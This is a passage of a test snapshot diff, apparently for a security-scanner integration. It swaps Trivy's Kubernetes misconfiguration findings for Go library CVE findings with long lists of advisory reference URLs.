intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://pkg.go.dev/vuln/GO-2022-0619", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://security.netapp.com/advisory/ntap-20220923-0005/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1996", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220524220425-1d687d428aca", + "packageName": "golang.org/x/net", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "category": "Vulnerability", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/2107371", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/2107383", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0001", - ], - }, - "category": "Misconfiguration", - "description": "Disable anonymous requests to the API server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set '--anonymous-auth' to 'false'.", - "name": "Ensure that the --anonymous-auth argument is set to false(Ensure that the --anonymous-auth argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0001", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/2107388", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0006", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0006", - ], - }, - "category": "Misconfiguration", - "description": "Verify kubelet's certificate before establishing connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Follow the Kubernetes documentation and setup the TLS connection between the apiserver and kubelets. ", - "name": "Ensure that the --kubelet-certificate-authority argument is set as appropriate(Ensure that the --kubelet-certificate-authority argument is set as appropriate)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0006", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/2124669", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0010", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0010", - ], - }, - "category": "Misconfiguration", - "description": "Limit the rate at which the API server accepts requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Follow the Kubernetes documentation and set the desired limits in a configuration file. Then, edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set the below parameters.", - "name": "Ensure that the admission control plugin EventRateLimit is set(Ensure that the admission control plugin EventRateLimit is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0010", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/2132872", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV0012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/ksv0012", - ], - }, - "category": "Misconfiguration", - "description": "Always pull images.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include AlwaysPullImages.", - "name": "Ensure that the admission control plugin AlwaysPullImages is set(Ensure that the admission control plugin AlwaysPullImages is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv0012", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0013", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0013", - ], - }, - "category": "Misconfiguration", - "description": "The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. This should be used where PodSecurityPolicy is not in place within the cluster.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include SecurityContextDeny, unless PodSecurityPolicy is already in place.", - "name": "Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used(Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0013", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0018", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0019", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0019", - ], - }, - "category": "Misconfiguration", - "description": "Enable auditing on the Kubernetes API Server and set the desired audit log path.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-path parameter.", - "name": "Ensure that the --audit-log-path argument is set(Ensure that the --audit-log-path argument is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0019", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/54658", + }, + { + "type": "URL", + "value": "https://go.dev/cl/428735", + }, + { + "type": "URL", + "value": "https://go.dev/issue/54658", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202209-26", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0020", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220524220425-1d687d428aca", + "packageName": "golang.org/x/net", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0020", + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", ], }, - "category": "Misconfiguration", - "description": "Retain the logs for at least 30 days or as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxage parameter to 30 or as an appropriate number of days.", - "name": "Ensure that the --audit-log-maxage argument is set to 30 or as appropriate(Ensure that the --audit-log-maxage argument is set to 30 or as appropriate)", + "category": "Vulnerability", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "request smuggling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0020", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + }, + { + "type": "URL", + "value": "https://go.dev/cl/447396", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56352", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0021", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.7.0", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220524220425-1d687d428aca", + "packageName": "golang.org/x/net", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0021", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, - "category": "Misconfiguration", - "description": "Retain 10 or an appropriate number of old log files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxbackup parameter to 10 or to an appropriate value.", - "name": "Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate(Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate)", + "category": "Vulnerability", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "mitigation": undefined, + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0021", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + }, + { + "type": "URL", + "value": "https://go.dev/cl/468135", + }, + { + "type": "URL", + "value": "https://go.dev/cl/468295", + }, + { + "type": "URL", + "value": "https://go.dev/issue/57855", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", + }, + { + "type": "URL", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0022", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "0.4.0", + "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220524220425-1d687d428aca", + "packageName": "golang.org/x/net", "references": [ - 